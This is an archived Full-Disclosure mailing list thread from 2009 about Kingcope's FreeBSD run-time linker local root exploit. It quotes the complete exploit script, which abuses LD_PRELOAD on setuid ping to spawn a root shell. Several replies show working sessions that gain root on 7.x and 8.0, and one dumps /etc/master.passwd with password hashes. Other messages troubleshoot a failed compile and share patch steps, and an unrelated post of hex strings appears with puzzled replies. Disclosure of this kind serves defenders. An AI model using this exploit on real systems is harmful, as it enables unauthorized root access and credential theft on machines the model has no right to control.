Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <8a1ab0ce0912010359l1acf3e59w9253956dab200b73@mail.gmail.com> References: <8a1ab0ce0912010359l1acf3e59w9253956dab200b73@mail.gmail.com> Message-ID: Not to disappoint, but it doesn't look like it even compiled, might be the reason it didn't work. Sent from my iPhone On 1 Dec 2009, at 11:59, r00f r00f wrote: > I have a box with release 7.1 > > uname -a gives back this : > > FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 > GNU/Linux > > by running the exploit it gives me this error and doesn't getting > rooted..I didn't do anything to patch it ..:s and it doesn't works :p > > FreeBSD local r00t zeroday > by Kingcope > November 2009 > env.c: In function 'main': > env.c:5: warning: incompatible implicit declaration of built-in > function 'malloc' > env.c:9: warning: incompatible implicit declaration of built-in > function 'strcpy' > env.c:11: warning: incompatible implicit declaration of built-in > function 'execl' > "c1: error: unrecognized command line option "-fPIC > gcc: program.o: No such file or directory > 'cc: unrecognized option '-nostartfiles > cp: cannot stat `w00t.so.1.0': No such file or directory > test.sh: line 35: ./env: No such file or directory > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From robert.portvliet at gmail.com Tue Dec 1 16:45:38 2009 From: robert.portvliet at gmail.com (Robert Portvliet) Date: Tue, 1 Dec 2009 11:45:38 -0500 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <4B1455EC.3030103@covertinferno.org> References: <4B1455EC.3030103@covertinferno.org> Message-ID: <37bc42c60912010845y5ba56829w339fff1fc5a8652d@mail.gmail.com> Confirmed on FreeBSD 8.0 $ uname -a FreeBSD 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root at almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 $ id uid=1001(rportvli) gid=1001(rportvli) groups=1001(rportvli) $ ./freebsd-0day.sh Desktop env env.c freebsd-0day.sh program.c program.o w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # id uid=1001(rportvli) gid=1001(rportvli) euid=0(root) groups=1001(rportvli) # On Mon, Nov 30, 2009 at 6:31 PM, phantomcircuit wrote: > Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update. > > %sh exploit.sh > Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o > private program.c program.o public public_html run.sh w00t.so.1.0 > FreeBSD local r00t zeroday > by Kingcope > November 2009 > env.c: In function 'main': > env.c:5: warning: incompatible implicit declaration of built-in function > 'malloc' > env.c:9: warning: incompatible implicit declaration of built-in function > 'strcpy' > env.c:11: warning: incompatible implicit declaration of built-in > function 'execl' > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > ALEX-ALEX > # id > uid=1001(phantomcircuit) gid=20(staff) euid=0(root) > groups=20(staff),0(wheel) > # uname -a > FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0: > Fri Oct ?2 12:21:39 UTC 2009 > root at i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC ?i386 > # > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From golunski at onet.eu Tue Dec 1 16:59:14 2009 From: golunski at onet.eu (Dawid Golunski) Date: Tue, 1 Dec 2009 16:59:14 +0000 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <72f8221d0911301412r26a72e54g595ac7b364e63346@mail.gmail.com> References: <72f8221d0911301412r26a72e54g595ac7b364e63346@mail.gmail.com> Message-ID: <93A96D40-F243-4D46-8909-9731A91E02B5@onet.eu> Confirmed on FreeBSD 7.2-RELEASE (GENERIC). Dawid On 30 Nov 2009, at 22:12, Kingcope wrote: > ** FreeBSD local r00t 0day > Discovered & Exploited by Nikolaos Rangos also known as Kingcope. > Nov 2009 "BiG TiME" > > "Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg > > There is an unbelievable simple local r00t bug in recent FreeBSD > versions. > I audited FreeBSD for local r00t bugs a long time *sigh*. Now it > pays out. > > The bug resides in the Run-Time Link-Editor (rtld). > Normally rtld does not allow dangerous environment variables like > LD_PRELOAD > to be set when executing setugid binaries like "ping" or "su". > With a rather simple technique rtld can be tricked into > accepting LD variables even on setugid binaries. > See the attached exploit for details. > > Example exploiting session > ********************************** > %uname -a;id; > FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 > 15:48:17 UTC 2009 > root at almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 > uid=1001(kcope) gid=1001(users) groups=1001(users) > %./w00t.sh > FreeBSD local r00t zeroday > by Kingcope > November 2009 > env.c: In function 'main': > env.c:5: warning: incompatible implicit declaration of built-in > function 'malloc' > env.c:9: warning: incompatible implicit declaration of built-in > function 'strcpy' > env.c:11: warning: incompatible implicit declaration of built-in > function 'execl' > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > /libexec/ld-elf.so.1: environment corrupt; missing value for > ALEX-ALEX > # uname -a;id; > FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 > 15:48:17 UTC 2009 > root at almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 > uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users) > # cat /etc/master.passwd > # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 > kensmith Exp $ > # > root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/ > bin/csh > toor:*:0:0::0:0:Bourne-again Superuser:/root: > daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/ > nologin > operator:*:2:5::0:0:System &:/:/usr/sbin/nologin > bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin > tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin > kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin > games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin > news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin > man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin > sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin > smmsp:*:25:25::0:0:Sendmail Submission > User:/var/spool/clientmqueue:/usr/sbin/nologin > mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/ > sbin/nologin > bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin > proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/ > nologin > _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin > _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin > uucp:*:66:66::0:0:UUCP > pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico > pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin > www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin > nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/ > nologin > kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User > &:/home/kcope:/bin/sh > # > > Systems tested/affected > ********************************** > FreeBSD 8.0-RELEASE *** VULNERABLE > FreeBSD 7.1-RELEASE *** VULNERABLE > FreeBSD 6.3-RELEASE *** NOT VULN > FreeBSD 4.9-RELEASE *** NOT VULN > > *EXPLOIT* > > #!/bin/sh > echo ** FreeBSD local r00t zeroday > echo by Kingcope > echo November 2009 > cat > env.c << _EOF > #include > > main() { > extern char **environ; > environ = (char**)malloc(8096); > > environ[0] = (char*)malloc(1024); > environ[1] = (char*)malloc(1024); > strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0"); > > execl("/sbin/ping", "ping", 0); > } > _EOF > gcc env.c -o env > cat > program.c << _EOF > #include > #include > #include > #include > > void _init() { > extern char **environ; > environ=NULL; > system("echo ALEX-ALEX;/bin/sh"); > } > _EOF > gcc -o program.o -c program.c -fPIC > gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o - > nostartfiles > cp w00t.so.1.0 /tmp/w00t.so.1.0 > ./env > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From terdlinkmobile at gmail.com Tue Dec 1 17:03:01 2009 From: terdlinkmobile at gmail.com (FBI BOT) Date: Tue, 1 Dec 2009 12:03:01 -0500 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <37bc42c60912010845y5ba56829w339fff1fc5a8652d@mail.gmail.com> References: <4B1455EC.3030103@covertinferno.org> <37bc42c60912010845y5ba56829w339fff1fc5a8652d@mail.gmail.com> Message-ID: <8cb10cf00912010903l343b585al566085f78ae18e5c@mail.gmail.com> LOL r00f r00f didn't have gcc installed :-O -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/91e08f80/attachment.html From oliver.pinter at gmail.com Tue Dec 1 17:28:33 2009 From: oliver.pinter at gmail.com (Oliver Pinter) Date: Tue, 1 Dec 2009 18:28:33 +0100 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <8a1ab0ce0912010359l1acf3e59w9253956dab200b73@mail.gmail.com> References: <8a1ab0ce0912010359l1acf3e59w9253956dab200b73@mail.gmail.com> Message-ID: <200912011828.33295.oliver.pinter@gmail.com> On Tuesday 01 December 2009 12.59.59 r00f r00f wrote: > I have a box with release 7.1 > > uname -a gives back this : > > FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 > GNU/Linux and a freebsd uname -a looks like this: FreeBSD foobarbaz 7.2-STABLE FreeBSD 7.2-STABLE #21 r199967+31134af: Tue Dec 1 02:54:53 CET 2009 root at foobarbaz:/usr/obj/usr/src/sys/stable amd64 but it's a good shot ;) > > by running the exploit it gives me this error and doesn't getting rooted..I > didn't do anything to patch it ..:s and it doesn't works :p > > FreeBSD local r00t zeroday > by Kingcope > November 2009 > env.c: In function 'main': > env.c:5: warning: incompatible implicit declaration of built-in function > 'malloc' > env.c:9: warning: incompatible implicit declaration of built-in function > 'strcpy' > env.c:11: warning: incompatible implicit declaration of built-in function > 'execl' > "c1: error: unrecognized command line option "-fPIC > gcc: program.o: No such file or directory > 'cc: unrecognized option '-nostartfiles > cp: cannot stat `w00t.so.1.0': No such file or directory > test.sh: line 35: ./env: No such file or directory -- thanks, Oliver From r00fsec at gmail.com Tue Dec 1 17:58:55 2009 From: r00fsec at gmail.com (r00f r00f) Date: Tue, 1 Dec 2009 17:58:55 +0000 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday Message-ID: <8a1ab0ce0912010958v120ae976o137ed400f7141f34@mail.gmail.com> > > *From*: Oliver Pinter > *Date*: Tue, 1 Dec 2009 18:28:33 +0100 > ------------------------------ > > On Tuesday 01 December 2009 12.59.59 r00f r00f wrote: > > I have a box with release 7.1 > > uname -a gives back this : > > FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 > GNU/Linux > > and a freebsd uname -a looks like this:..... > > IT gives me this : Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux *From*: FBI BOT > *Date*: Tue, 1 Dec 2009 12:03:01 -0500 > ------------------------------ > > LOL r00f r00f didn't have gcc installed :-O > > OMG What are you saying ?? I have the gcc installed my friend.. i have just compile a .c file.. and if i type "gcc" it returns me gcc: No input files specified Ok ? Thanks! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/7985b8ea/attachment.html From oliver.pinter at gmail.com Tue Dec 1 18:13:55 2009 From: oliver.pinter at gmail.com (Oliver Pinter) Date: Tue, 1 Dec 2009 19:13:55 +0100 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <8a1ab0ce0912010958v120ae976o137ed400f7141f34@mail.gmail.com> References: <8a1ab0ce0912010958v120ae976o137ed400f7141f34@mail.gmail.com> Message-ID: <200912011913.55451.oliver.pinter@gmail.com> On Tuesday 01 December 2009 18.58.55 r00f r00f wrote: > > *From*: Oliver Pinter > > *Date*: Tue, 1 Dec 2009 18:28:33 +0100 > > ------------------------------ > > > > On Tuesday 01 December 2009 12.59.59 r00f r00f wrote: > > > > I have a box with release 7.1 > > > > uname -a gives back this : > > > > FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 > > GNU/Linux > > > > and a freebsd uname -a looks like this:..... > > IT gives me this : > > Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 > i686 i686 i386 GNU/Linux and what is your: sysctl kern.osreldate ? > > *From*: FBI BOT > > > *Date*: Tue, 1 Dec 2009 12:03:01 -0500 > > ------------------------------ > > > > LOL r00f r00f didn't have gcc installed :-O > > OMG What are you saying ?? > > I have the gcc installed my friend.. i have just compile a .c file.. > > and if i type "gcc" it returns me > > gcc: No input files specified > > Ok ? > > Thanks! -- thanks, Oliver From r00fsec at gmail.com Tue Dec 1 18:33:04 2009 From: r00fsec at gmail.com (r00f r00f) Date: Tue, 1 Dec 2009 18:33:04 +0000 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday Message-ID: <8a1ab0ce0912011033p4bb98612v625118f2cdd4fd75@mail.gmail.com> *From*: Oliver Pinter > *Date*: Tue, 1 Dec 2009 19:13:55 +0100 > ------------------------------ > and what is your: sysctl kern.osreldate ? Here it is! kern.osreldate: 701000 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/3d1aa99b/attachment.html From jdl at mac.hush.com Tue Dec 1 19:46:51 2009 From: jdl at mac.hush.com (genesis project) Date: Tue, 01 Dec 2009 19:46:51 +0000 Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] Message-ID: <20091201194651.8F9E32803F@smtp.hushmail.com> BEGIN TRANSMISSION 7040dc5b9583e367068a06f25a7bce8a 93e085c3571947bb935af4c8e62df42e bd9859da693421728921176693226dbb 27d4a0a73b79efc8f229e709bf9c5858 b49b4e3ece77173db3a3ce246f31ba56 bfca9db2ba007b1c44e5fca8b8f05a0e 0da3451c72565616d07010df1b241737 0a6857b1895b228050776841b32affd6 4f47f89f28926ef6ea7300537664cbe4 760cebf1739ed06bb89f20ab3eb2f811 d3f949c42963ad5d5628bfdf75c374e3 93be00d1f1f8699f11a196c5d331d03a 1787abb29dc4727cc16b3fee8a2e92cb 6282f38dc06e7932c4f4b3c848d71e08 6ba17f76a3b93f26a42abaa1e631c0e3 39784740bbf93b2b83b0c58403943ee8 b5bf1ef91072822b2675945d4fc3bc59 d38bac3fcaedaed11fb3f1273248fbe0 e1315c4290e7af09ad8532f40842ab21 958ace1fe31a29df9e0ae7def01a72e9 1ea95dfa189f03e723d800a14740197c 987205d906e98d1e23c46659bfeb389a 5286827e25643a66b0d4823ee492004a 2481d318d6ea2ea2af10af64d2203ac6 02a3c07ae1f9662d4375d6586e6cce97 b7095f8e8a4e0a4bbc1155ef2c495b4f af671a4192a4ac0732da175185cb690c e5a48398e8bf9a9fe274421ea48e532d e95961cf8f47623bab5e3be8541c7aea b8f76f41598302462affd1fb917818b3 df89576229f264ae2c7aebd92f3eb5c1 ee6271d6d6f4dadd9d93f265446898d7 76763d316ec90789ae9ed3bda0f260b0 fd945157f527a52ce78b37a662ba3ae2 65845c483be88ac1b5be34cb4a39a062 b30f718f101a3967e471ae8827e8e2f2 3ad2e2f177788d06b6ddedf01d641864 c19975a84d2915d7de2e5aaca973aff3 268cbcea00e2ac78f497e3c40b5d6d16 baa6552f904cfe608733a290fb3b0348 8cef9785397784af320aad64d4a451fa 1185b5a82873f3b6a7af2e80b7000819 3a4af85f5803b75265e9d8483b311858 8d5ab13bf268d5af676f8d21b6463088 2a1c3be1c1fea0bb80a1242732f52003 1a052508cb706d60f970fc0b31929e2d 5c2a7806346bcd89a24678fa0e556b24 c34ea7f66d8adda39ab4d31a293944c5 2dfb7c91e7debc2c47028abba9878b8e a83842d1970b8b9361b28994bdea133e 9988fe16e6783b97f30dae9879b43108 f7c2adcf3501371516b5cd7c41afade0 3f92a19b63644fab656f38413ab99f49 bc3afe9ce52461a1a48203ad832b04da dca51c6e633166ad7361086ae604bc9e 3f02d51fa412af42fc8569a416a992b8 342c8599434faee181456f5ba1ecb89c 936f1f7c562f1d62383981f727770724 5e99612e8301260b3fe3f4310b301d69 dd5810c0a8b60b34c423dee8383323bc 001ebe4cfff9e32ef4ee19137485a2cd 8f5b148e2c3edcfc82f6b225a8642383 ca00bd55ba0164405edd8965f0f527be 83b70c007d10927fce8be15cd387e19f 10248928399d1a23d543a12fa2ce55f3 597e73653a1798f6c7ae859e6bcbb0af 50f6f302cdf09f97c35feb22353b7df5 f726a9833d6cb765241f5b5407c75aff 958ace1fe31a29df8b8df3134373bee0 1f6a7b08e47d947e0e5641802c9e4af6 666925ac26c0df66038ec6a2b05df1ff 6d3f62a326e6685a505463353c8f5dc3 58d29e01339ce1ebc04db879e36be2a1 f089a9ab5b3404d9e2dd14857a49fc15 cd7545c0c1c0ccaa220b8eb542a50a09 b984f08075ac64b29d0e0f06fbae8427 b2daa21b13c410b5265d2e4398365f2b f8b6f1db0c9b44adf497e3c40b5d6d16 e0603724697cc1c0c119adf3c4c2fbc3 3ddf0c148fee11380606ca727bc419e7 41e6e4a81e4e27411eee1fe5f0da834b 81079622b23ce42817262bbbdcde38c9 209d1e47a7bcb71d813b58bf4809881e 1488a239d560d41d987af10a94a1ecab fe20ecdaf9c90ec04ce346d85aed6d91 c32ee9c5be9c64cecef763decfad4dca 2907176aac354b46ebfec5d51a3f5294 cb53a79af06450347c2f041f78c73aa9 a3ecabc26e17d9213f92a19b63644fab 79ba44f07337f89707282e178959d582 3915966def8d5939b3dcaa99a0f63dfb 55ef531b7722a7f847183bb5cd62b448 2cbd414bdf1769637f121cafb1a4e42c 3f92a19b63644fab686ef611d64d4641 93bde960aca5996742dcf0680fee7558 9c3d2204d817bd95bbc5031eb85239a4 ad3b70730307b0924c3caf13dc6696fb de091866bed93da6582cbff43b18ad70 34c370a3e5eefb81290eebf586d15184 2871985cdc38e885b16836e8598f98c3 3aa1f46ba0b2e10ff1fe16987ab96eea f4894f0f34ab1e64d7461fb1bf45342f e221c95c7502b1d1a8a3cdc2cf7bd7aa 2012c9af47d83a325e1d0ccff62e6f64 654f6e35ce564578b242ade81f1a56ef 3bc2d195600ec07a0e16b72f946bcb5d 16f5408569724cd19b6bd8deb9070a7e e52e66188a45d27c4b6dc31ae3b202df c218181a6b95baf8c9331e3d07d06dde 83b66338d7bb3f5e4065fb8fa70656ca 4a1b0b72f02795fa3f92a19b63644fab 0df1df0e0383002a5988938195dbb95f 2a98945ce29d90a761f21d49a9fcaaff aa69c6e314fe570da60f9889f9b3f5b7 0ef3c0e63d60af7bf7bdbad9a56f92c1 e3304feb10c583e0414961201ead7711 dc4bf95b9e80405f0e5baa8088f200da 20d77139485e7dcb6f6802b339a56f44 a3bbcef064dcc7b317ee3b975ef28472 76561a553f3dd6908aa898fb892c4238 8853bd85b9c969c0bb0deabf92b01aab 35ba007891228128afdcaeaf3c75f4e7 955b6f31ad3bef73f204e86b358dc297 ea0ec008244731b21d8ef6c5e7e91dcc d7a9f71371167a91ad54212902f79cea 293c912e8749701beb0ec4c5946e41a8 a9438f75f0ca8520a372413806ff69e4 db0e4462db5db8fe3c72948e3c77c27c e4b78b2581d95ff7623c0a42459334da 9bf2fcbd6c442fdbba0ba3d2a740a4ee c8e82bbbed2d7e9d49be06c1b8f55d69 cccc9543acdfbdc6a78ced6d2c93dfe5 9096e859cf9b831a72357556d4c6efa0 63fe302dd2fc94021b857452dffee418 55024e629d64f1681d147e79d082ca43 b2d0166cbe8856873dc9f68a565fc385 194a35ce4915024a83bd142ef11623a0 3807189affca88837b55866d55ef3d9d e7a4d0b15aed6b3af543998ae2e30daf 26968709d7ef111df6e2f67eb4b1bfad 3e5dfd1c173169e488f27a97761c4f55 49e2092463c532e7d4b1df036b49ae64 628318b514345b9b690bcbef6d1cb48c 302d2de50749957722446cc8dd687648 a479b9040d6f040139df82f206abdbd2 9db938625926c0eeba87865e43b6b1db 194b5cc62b18ba57f402bf66d78012d6 4419b0f2c563262decde2e9ccab332a7 73521e12ca84441eefa7a98b25adc705 aae8ad240dc401b7cf321def52ae1cce acb630e1900e275250abf22d6ae13062 aa671f4cc4a8a0a602c52a6278bb4f2d 55f09792703c984f6321b1c5f929878f 050f32bdf3350f2ebc8921dd89ad848e ff215f1f313f322baaff624e7e458a9e 059002c7580d9558f49e50e9f7377df4 d6a24c1f2142abd103003338801da3a8 047dc4dff18bdd198d38c5512963620a eb7540536991d738b91d110bb8269b89 0d44b28da8fe881f091f2ad5522e008a 25a74e3446db34326cd21b3371a9a08c 90b44e7e53d3ade605c0f3d5a4618c4b 9e00fc8d31325c5d0c3ce21c0ae28193 aac3a86fa21196a4172291f4daf8c9df c9845d6996b41daa1242216ada091bb7 b711ae04ce0fc771ef0800f576e3e8ab 2f467e85ad7767c6cf31c40c4df46d74 1e2755823a16c89caa5c759c323b9f14 c11a7ace4c3954f299e15335d1042ccc a888c6bbad3434d54cd418a4ae94fe8d 51917f11d9f248d3ba3ad7cbc0e32269 4f8cfa5108f64571f5c365582fcdb6bd 25fff28dee2a9c2422446cc8dd687648 fc765f312565d13e36c7faa21fc52059 88c1f0da9986ca1a0cccf04e7941c058 494e0e793bf2b978051e0e63bd30685a 9064c122b0674b0ef780e8e79533d1ca b0237fdd8c8393ac12ddb22764fd913f d24f7abf637ca394c8c7c66406cc9e3a f491206098ecb0cc2bce5b6bf689483d 42f2b4d1fa8ebdc5 END TRANSMISSION From chort0 at gmail.com Tue Dec 1 19:47:21 2009 From: chort0 at gmail.com (bk) Date: Tue, 1 Dec 2009 11:47:21 -0800 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <8a1ab0ce0912011033p4bb98612v625118f2cdd4fd75@mail.gmail.com> References: <8a1ab0ce0912011033p4bb98612v625118f2cdd4fd75@mail.gmail.com> Message-ID: <2051E951-783D-4BC8-855B-D1CFD0969308@gmail.com> On Dec 1, 2009, at 10:33 AM, r00f r00f wrote: > > > From: Oliver Pinter > Date: Tue, 1 Dec 2009 19:13:55 +0100 > and what is your: > sysctl kern.osreldate ? > > Here it is! > kern.osreldate: 701000 _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Is that the Debian userland/FreeBSD kernel thingy? -- chort -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/80b89087/attachment.html From me at b3nji.com Tue Dec 1 19:52:28 2009 From: me at b3nji.com (Benji) Date: Tue, 1 Dec 2009 19:52:28 +0000 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <2051E951-783D-4BC8-855B-D1CFD0969308@gmail.com> References: <8a1ab0ce0912011033p4bb98612v625118f2cdd4fd75@mail.gmail.com> <2051E951-783D-4BC8-855B-D1CFD0969308@gmail.com> Message-ID: I think we're missing the point here. The exploit didnt compile due to his/her copy of gcc which apparently doesnt understand -fPIC ""c1: error: unrecognized command line option "-fPIC". Thus, obviously, there's no chance it was ever going to work. On Tue, Dec 1, 2009 at 7:47 PM, bk wrote: > > > On Dec 1, 2009, at 10:33 AM, r00f r00f wrote: > > > > *From*: Oliver Pinter >> *Date*: Tue, 1 Dec 2009 19:13:55 +0100 >> ------------------------------ >> > and what is your: > sysctl kern.osreldate ? > > > Here it is! > > kern.osreldate: 701000 _______________________________________________ > > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > > Is that the Debian userland/FreeBSD kernel thingy? > > -- > chort > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/27066780/attachment.html From michal.manterys at gmail.com Tue Dec 1 19:55:53 2009 From: michal.manterys at gmail.com (=?ISO-8859-2?Q?Micha=B3_Manterys?=) Date: Tue, 1 Dec 2009 20:55:53 +0100 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday Message-ID: http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071689.html $ uname -a FreeBSD serev1.domena.pl 7.2-STABLE FreeBSD 7.2-STABLE #1: Tue Dec 1 19:42:43 CET 2009 root at server1.domena.pl:/usr/src/sys/i386/compile/kern1 i386 $ ./test.sh env env.c program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX #id -a uid=1018(user) gid=1018(user) euid=0(root) groups=1018(user) Install patch: cd /usr/src/libexec/rtld-elf fetch http://wojciech.sychut.eu/rtld.patch patch < rtld.patch make clean make make install and: $ ./test.sh env env.c program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX #id -a uid=1018(user) gid=1018(user) euid=0(root) groups=1018(user) -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/977078f0/attachment.html From michael.holstein at csuohio.edu Tue Dec 1 21:22:08 2009 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Tue, 01 Dec 2009 16:22:08 -0500 Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] In-Reply-To: <20091201194651.8F9E32803F@smtp.hushmail.com> References: <20091201194651.8F9E32803F@smtp.hushmail.com> Message-ID: <4B158900.8000601@csuohio.edu> > BEGIN TRANSMISSION > > 7040dc5b9583e367068a06f25a7bce8a > wtf is this? .. up until the last line it looks like md5 hashes. Number stations used to be fun to find when I was like 15 .. and I thought for a minute this might be something funny when run through john with format=raw-MD5, but ..meh. Cheers, Michael Holstein Cleveland State University From cody at hawkhost.com Tue Dec 1 21:25:16 2009 From: cody at hawkhost.com (Cody Robertson) Date: Tue, 01 Dec 2009 16:25:16 -0500 Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] In-Reply-To: <4B158900.8000601@csuohio.edu> References: <20091201194651.8F9E32803F@smtp.hushmail.com> <4B158900.8000601@csuohio.edu> Message-ID: <4B1589BC.7030406@hawkhost.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Michael Holstein wrote: >> BEGIN TRANSMISSION >> >> 7040dc5b9583e367068a06f25a7bce8a >> > > wtf is this? .. up until the last line it looks like md5 hashes. > > Number stations used to be fun to find when I was like 15 .. and I > thought for a minute this might be something funny when run through john > with format=raw-MD5, but ..meh. > > > Cheers, > > Michael Holstein > Cleveland State University > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ An attempt to cause a conspiracy theory!? 